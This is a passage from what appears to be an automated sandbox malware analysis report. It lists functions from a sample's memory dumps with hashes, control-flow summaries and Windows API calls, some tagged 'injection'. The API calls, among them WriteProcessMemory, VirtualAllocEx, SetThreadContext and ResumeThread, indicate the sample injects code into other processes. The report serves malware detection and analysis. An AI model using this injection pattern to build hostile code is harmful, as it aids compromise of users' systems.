                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 784c28111c48f642ef1bd9ce7cca7e8325dffc3dd9c4505eb104440ebfe88ef5
                                                                      • Instruction ID: 5c283fbf717e0b1516800569d6abbe6b578f910343e06b39787dc31c34f408cb
                                                                      • Opcode Fuzzy Hash: 784c28111c48f642ef1bd9ce7cca7e8325dffc3dd9c4505eb104440ebfe88ef5
                                                                      • Instruction Fuzzy Hash: 272139719003099FCF10CFA9C884BEEBBF9FF48314F10842AE919A7250D7789954DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 009933E8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 357 9933e8-99343e 359 99344e-99348d WriteProcessMemory 357->359 360 993440-99344c 357->360 362 99348f-993495 359->362 363 993496-9934c6 359->363 360->359 362->363
                                                                      APIs
                                                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 00993480
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: bab76cd7294a9eeaf68da2c51fb347cee05175ab9ebcff2fa200f68977aedf70
                                                                      • Instruction ID: 3b0b1bad875e35bf66cf0d42e2964678aea2efbdff6b607d5bc191a906a87455
                                                                      • Opcode Fuzzy Hash: bab76cd7294a9eeaf68da2c51fb347cee05175ab9ebcff2fa200f68977aedf70
                                                                      • Instruction Fuzzy Hash: 2B2148759003499FCF10CFA9C884BEEBBF5BF48314F15842AE519A7250D7789984CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 009939D0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 377 9939d0-993a65 ReadProcessMemory 380 993a6e-993a9e 377->380 381 993a67-993a6d 377->381 381->380
                                                                      APIs
                                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00993A58
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: a5ce8376c2bcd6742ab339b3fc662ca3e675f09128553a16bda8735773ae5e87
                                                                      • Instruction ID: b398b6a810cd833255b771cfef687db883367745b174805ef5a52b1fc918e47b
                                                                      • Opcode Fuzzy Hash: a5ce8376c2bcd6742ab339b3fc662ca3e675f09128553a16bda8735773ae5e87
                                                                      • Instruction Fuzzy Hash: 9E2155718003499FCF10CFAAD880AEEBBB5FF48314F14842EE919A7240D7789945DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00993251 Relevance: 1.6, APIs: 1, Instructions: 65threadinjectionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 385 993251-9932a3 387 9932b3-9932e3 SetThreadContext 385->387 388 9932a5-9932b1 385->388 390 9932ec-99331c 387->390 391 9932e5-9932eb 387->391 388->387 391->390
                                                                      APIs
                                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 009932D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThread
                                                                      • String ID:
                                                                      • API String ID: 1591575202-0
                                                                      • Opcode ID: 56af4d3a12987de933d50ebb9fea1ae571417d96b59f28982e35f7d46eca0d48
                                                                      • Instruction ID: b0bef5001f42ce2560c3842aa159496ccb1d84ea5176430f821b9146484e74cf
                                                                      • Opcode Fuzzy Hash: 56af4d3a12987de933d50ebb9fea1ae571417d96b59f28982e35f7d46eca0d48
                                                                      • Instruction Fuzzy Hash: 7C212871D043088FDB10DFA9C4847EEBBF9AF48314F14842ED469A7240D7789985CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00996DF8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 395 996df8-996e4a 397 996e4c-996e54 395->397 398 996e56-996e85 EnumChildWindows 395->398 397->398 399 996e8e-996ebb 398->399 400 996e87-996e8d 398->400 400->399
                                                                      APIs
                                                                      • EnumChildWindows.USER32(?,00000000,?), ref: 00996E78
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: ChildEnumWindows
                                                                      • String ID:
                                                                      • API String ID: 3555792229-0
                                                                      • Opcode ID: 2b984a2f4a2e3596a2540bc28bb663c1e978e11e1d19f25f99e4f655db4a8b51
                                                                      • Instruction ID: 09867d2e382afeafbd88a89331f5405cea71773f06bba914a76a0c9e2c17951a
                                                                      • Opcode Fuzzy Hash: 2b984a2f4a2e3596a2540bc28bb663c1e978e11e1d19f25f99e4f655db4a8b51
                                                                      • Instruction Fuzzy Hash: 26216875D042098FDB10CFA9D944BEEFBF9EF88314F14842AD419A3290D778A945CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00993258 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 404 993258-9932a3 406 9932b3-9932e3 SetThreadContext 404->406 407 9932a5-9932b1 404->407 409 9932ec-99331c 406->409 410 9932e5-9932eb 406->410 407->406 410->409
                                                                      APIs
                                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 009932D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThread
                                                                      • String ID:
                                                                      • API String ID: 1591575202-0
                                                                      • Opcode ID: 5603a59b65aee657667362fd91a66ebf5124e40b512b1fbc70d0594faa5b16e6
                                                                      • Instruction ID: 81569638a39f37490dc32e15b4a5a6e2e2747dd680df1274281e4e87d14868d0
                                                                      • Opcode Fuzzy Hash: 5603a59b65aee657667362fd91a66ebf5124e40b512b1fbc70d0594faa5b16e6
                                                                      • Instruction Fuzzy Hash: 7A211871D003099FDB10DFAAC4847EEBBF9EF48314F54842AD529A7240DB789985CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 009939D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 414 9939d8-993a65 ReadProcessMemory 417 993a6e-993a9e 414->417 418 993a67-993a6d 414->418 418->417
                                                                      APIs
                                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00993A58
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: b27b2e86547c31b92df5daefa99568cf52708e4f39d1b1093c7e4c0c1862fcbe
                                                                      • Instruction ID: 07f4f6cf3be74308062bfb0bf2a4805fc65bf73ddb6d58edc557f8434d4c3747
                                                                      • Opcode Fuzzy Hash: b27b2e86547c31b92df5daefa99568cf52708e4f39d1b1093c7e4c0c1862fcbe
                                                                      • Instruction Fuzzy Hash: 042125719003099FCF10CFAAD884AEEBBF9FF48314F50882AE519A7240D7789945DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00995C1A Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 422 995c1a-995ca0 K32EnumProcessModules 424 995ca9-995cd1 422->424 425 995ca2-995ca8 422->425 425->424
                                                                      APIs
                                                                      • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 00995C93
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: EnumModulesProcess
                                                                      • String ID:
                                                                      • API String ID: 1082081703-0
                                                                      • Opcode ID: 2849182dd5011ab75d485fc3aa5cf11c4b3b900a2dd4da349529de9d24b84a1c
                                                                      • Instruction ID: 81c672ed21086a55d0ff413d98df53e6151934e31669d307502f0af386b8cc6e
                                                                      • Opcode Fuzzy Hash: 2849182dd5011ab75d485fc3aa5cf11c4b3b900a2dd4da349529de9d24b84a1c
                                                                      • Instruction Fuzzy Hash: 9C2127759002099FCB11CF9AD484BDEBBF4EF48320F15852AD459A7240D378A585DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00996E00 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 428 996e00-996e4a 430 996e4c-996e54 428->430 431 996e56-996e85 EnumChildWindows 428->431 430->431 432 996e8e-996ebb 431->432 433 996e87-996e8d 431->433 433->432
                                                                      APIs
                                                                      • EnumChildWindows.USER32(?,00000000,?), ref: 00996E78
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: ChildEnumWindows
                                                                      • String ID:
                                                                      • API String ID: 3555792229-0
                                                                      • Opcode ID: 0a6be3a739ba2bdb5eb678e077d8d1540e52a95e4fd4e86edcca15f8da3a520d
                                                                      • Instruction ID: 06501e68e8c51c7fdb1a010d6de6aee03c5cd1d7db184282e5d219474dc18e6a
                                                                      • Opcode Fuzzy Hash: 0a6be3a739ba2bdb5eb678e077d8d1540e52a95e4fd4e86edcca15f8da3a520d
                                                                      • Instruction Fuzzy Hash: 032115759042098FDB10CF9AD944BEEFBF9EF88314F14842AE419A3250D778A945CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00995C20 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 00995C93
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: EnumModulesProcess
                                                                      • String ID:
                                                                      • API String ID: 1082081703-0
                                                                      • Opcode ID: 87cfb22462d4103dd8dd4b4b5a8894f331ea8ca6aebe4e52d36fb2c355524bab
                                                                      • Instruction ID: c79c034916b23b804aeccc9ef0779ea6149bb282b650b7dee1d1a2216c6fd7c9
                                                                      • Opcode Fuzzy Hash: 87cfb22462d4103dd8dd4b4b5a8894f331ea8ca6aebe4e52d36fb2c355524bab
                                                                      • Instruction Fuzzy Hash: 932124758002099FCB10CF9AD484BDEBBF8EF48320F11842AE458A7240D778A985CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00993328 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 437 993328-993373 439 99337a-9933ab VirtualAllocEx 437->439 440 9933ad-9933b3 439->440 441 9933b4-9933d9 439->441 440->441
                                                                      APIs
                                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0099339E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 113929d3668280b97af0d71bc5e0ea0389c9712a0d2017c4a0d69fb2d05302a2
                                                                      • Instruction ID: 26fe13560ae1e75c876d1522b7ff53c9220cfcf1f39bb8c4361d41b814ebf347
                                                                      • Opcode Fuzzy Hash: 113929d3668280b97af0d71bc5e0ea0389c9712a0d2017c4a0d69fb2d05302a2
                                                                      • Instruction Fuzzy Hash: 062167719042489FCF10CFA9D884AEFBBF5AF48324F14882AE419A7250C7799985DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00993330 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0099339E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 99dec435242dbbbb831a2542b6089ee41f522be33763354561c945dffe6b8868
                                                                      • Instruction ID: 5354afd9f0d2d3d671e0d2f779aa377c0850380ca4878e4571816c40389e933e
                                                                      • Opcode Fuzzy Hash: 99dec435242dbbbb831a2542b6089ee41f522be33763354561c945dffe6b8868
                                                                      • Instruction Fuzzy Hash: 1B1137719002089FCF10CFA9D844BEFBBF9EF48324F14882AE519A7250D7759954DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00993100 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 7456028eeb73893b16915f0b88eda556db67aa054ab08a87ec642b42ca410715
                                                                      • Instruction ID: a3aac3385041eaf084f827279dc54a33738910dc8baed4d20d6b4d7dc83c43bc
                                                                      • Opcode Fuzzy Hash: 7456028eeb73893b16915f0b88eda556db67aa054ab08a87ec642b42ca410715
                                                                      • Instruction Fuzzy Hash: 93115B719043488FCB20CFA9D8447EEBBF9AF48324F14882AC515A7250D7799945CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00993108 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 3dc8db5c0efaa2b6410d99052b2eb8d68138424b155af56e9839012b52f5f263
                                                                      • Instruction ID: 50f23fc0dc82db2c981bced68f95d3dc75eb8fe87dcd0d6266f510c7a6473ebe
                                                                      • Opcode Fuzzy Hash: 3dc8db5c0efaa2b6410d99052b2eb8d68138424b155af56e9839012b52f5f263
                                                                      • Instruction Fuzzy Hash: 56113A71D043088FDB20DFAAD8447EFFBF9AF48324F14882AD519A7250D779A945CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A162B8 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2
                                                                      • API String ID: 0-450215437
                                                                      • Opcode ID: e2a3320aac86ac8b458c3c1ef814256079c7e0f228f4b85af8f4ef1d00662a2d
                                                                      • Instruction ID: dff379a278850f0a52dfc142709c3723ef67e87b46cf3a3501736d1ceae8d746
                                                                      • Opcode Fuzzy Hash: e2a3320aac86ac8b458c3c1ef814256079c7e0f228f4b85af8f4ef1d00662a2d
                                                                      • Instruction Fuzzy Hash: 16319631A04119EFCB05DF98E8549EEBB75FF89310F008026E812EB354DB31A916CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D70429 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: t%#m
                                                                      • API String ID: 0-1983186520
                                                                      • Opcode ID: 013072b452a78a4b43e5e87bdd95cc7f3e574a04eb1cb8064ec5bb8cebd6a77e
                                                                      • Instruction ID: a2468be5d5a34798cda44c3802f521c1c255339e835ce498dfe646f97816d156
                                                                      • Opcode Fuzzy Hash: 013072b452a78a4b43e5e87bdd95cc7f3e574a04eb1cb8064ec5bb8cebd6a77e
                                                                      • Instruction Fuzzy Hash: 2E21A770D083898FCB06DFB8D8544EDBFB1EF87304B1544AAD144E71A2DB341A06CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D70448 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: t%#m
                                                                      • API String ID: 0-1983186520
                                                                      • Opcode ID: e3e0ab12b813c2dd97ae84161d602d4da3c3536df429800c660e688ff00348c1
                                                                      • Instruction ID: eefc3debc11b281c8b04d4f2d987545247bd94fc330e21fcbcc1a99c2452cf09
                                                                      • Opcode Fuzzy Hash: e3e0ab12b813c2dd97ae84161d602d4da3c3536df429800c660e688ff00348c1
                                                                      • Instruction Fuzzy Hash: FE112A70D0020ADFCB14EFB9E8555EEBBB5FF8A305F108469D519A3250EB341A46CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 049D8A90 Relevance: .7, Instructions: 671COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407262268.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_49d0000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5c2be477c7f32466b315376fb0892f9dd2e37f36f6440b2ef154c7be170cc9d7
                                                                      • Instruction ID: 847fab9496eff500fc8a8969d3688431ce4c4be08cb4264ee827152e722c3021
                                                                      • Opcode Fuzzy Hash: 5c2be477c7f32466b315376fb0892f9dd2e37f36f6440b2ef154c7be170cc9d7
                                                                      • Instruction Fuzzy Hash: 3E32CE70B01128DFCB65BF38915467D7BEBAFC8640B04846AD806E7385DF30EE459BA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A191C0 Relevance: .4, Instructions: 446COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: db98a06c7cbd5309d4d84098c02f20dfde55b3491c019026016a445e53d1f88e
                                                                      • Instruction ID: 496219e9f900a69f21a221980d8847042e956efae9f01126d6889c9f383f7e33
                                                                      • Opcode Fuzzy Hash: db98a06c7cbd5309d4d84098c02f20dfde55b3491c019026016a445e53d1f88e
                                                                      • Instruction Fuzzy Hash: EF0264B0B041149FDB15EFA8E560AAF77FAEF88310F158025E406AB358DF34AD45DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 049DAAFD Relevance: .4, Instructions: 441COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407262268.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_49d0000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7891c1e74764b316d07c77e8aec85747ed5d0144a852e072c5a7614d2426136c
                                                                      • Instruction ID: 1645aaf1d237014240c45c461e5167e55fa09d27b88fea4dfeb92842ddd12afc
                                                                      • Opcode Fuzzy Hash: 7891c1e74764b316d07c77e8aec85747ed5d0144a852e072c5a7614d2426136c
                                                                      • Instruction Fuzzy Hash: 42F11570A093988FC3158F68C81459AFBF6AF82210B15C9FFD4919F656CB31BC85C7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A15178 Relevance: .3, Instructions: 325COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 200a4d62bafca9629e2f3faad048d2251a7514e5af77bdf7d14a08995149b9bc
                                                                      • Instruction ID: 0ff8ce10ca151ba00509aeb616f95947f42264db70d9ae831aac9ae9ccefaad8
                                                                      • Opcode Fuzzy Hash: 200a4d62bafca9629e2f3faad048d2251a7514e5af77bdf7d14a08995149b9bc
                                                                      • Instruction Fuzzy Hash: 41C18170F04204EBDB15EFA8E555BAE77B2EBC9304F154029D402AF398DB75AC42DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A11C20 Relevance: .3, Instructions: 319COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a65933acb1cb40050568611480c13a438ae7904cb3dc42b410770223cb828f71
                                                                      • Instruction ID: 9a64c7ae1b0890322a412b95653d2a53cf0dfe937d9682005b6b63a511eac822
                                                                      • Opcode Fuzzy Hash: a65933acb1cb40050568611480c13a438ae7904cb3dc42b410770223cb828f71
                                                                      • Instruction Fuzzy Hash: 71B1C434B081149FCB16FBA8E4A15BE37B3EBC9314B11841AD4066B399DF359D06DBB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7A630 Relevance: .3, Instructions: 289COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b5933abd47526dd96bdf8e428cfca76dbaac1df15ddd2ba3525718a9cd8f7bed
                                                                      • Instruction ID: 284bb072b1a090e4754155608a2ce23e03e045e388fc636cbc921dcf57ff7df1
                                                                      • Opcode Fuzzy Hash: b5933abd47526dd96bdf8e428cfca76dbaac1df15ddd2ba3525718a9cd8f7bed
                                                                      • Instruction Fuzzy Hash: AEA1F231A042159FCB15DFACD8409AFBBF2FBC9310B14852AE44A9B245EB30DD45DBB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A14588 Relevance: .3, Instructions: 275COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3f68ca2967aa872165666ca367f013670ada5d5a1d95fff543c221e8e853c1d4
                                                                      • Instruction ID: c107341449799937cefd914a96e29ee7b9476bc431dc1788064a52a628e32708
                                                                      • Opcode Fuzzy Hash: 3f68ca2967aa872165666ca367f013670ada5d5a1d95fff543c221e8e853c1d4
                                                                      • Instruction Fuzzy Hash: CBB156747041198FCB05EF6CE6549AE77F2EB8D314B118569E4029B399DF34AE02CBB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 049D8708 Relevance: .3, Instructions: 273COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407262268.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_49d0000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 84ccac4182becc52a9eac0d6cfe658173c6905496777bbb8e184ae25eb4088af
                                                                      • Instruction ID: eab11f79bcc98966bdb9c65e6a958b2b64e2a429d47a088c29c87212e268ad46
                                                                      • Opcode Fuzzy Hash: 84ccac4182becc52a9eac0d6cfe658173c6905496777bbb8e184ae25eb4088af
                                                                      • Instruction Fuzzy Hash: B681A031B012199BCB74BA69985473E35DBDBC4BD0B18C879D826D734AEE30EC4193A3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A14578 Relevance: .3, Instructions: 268COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
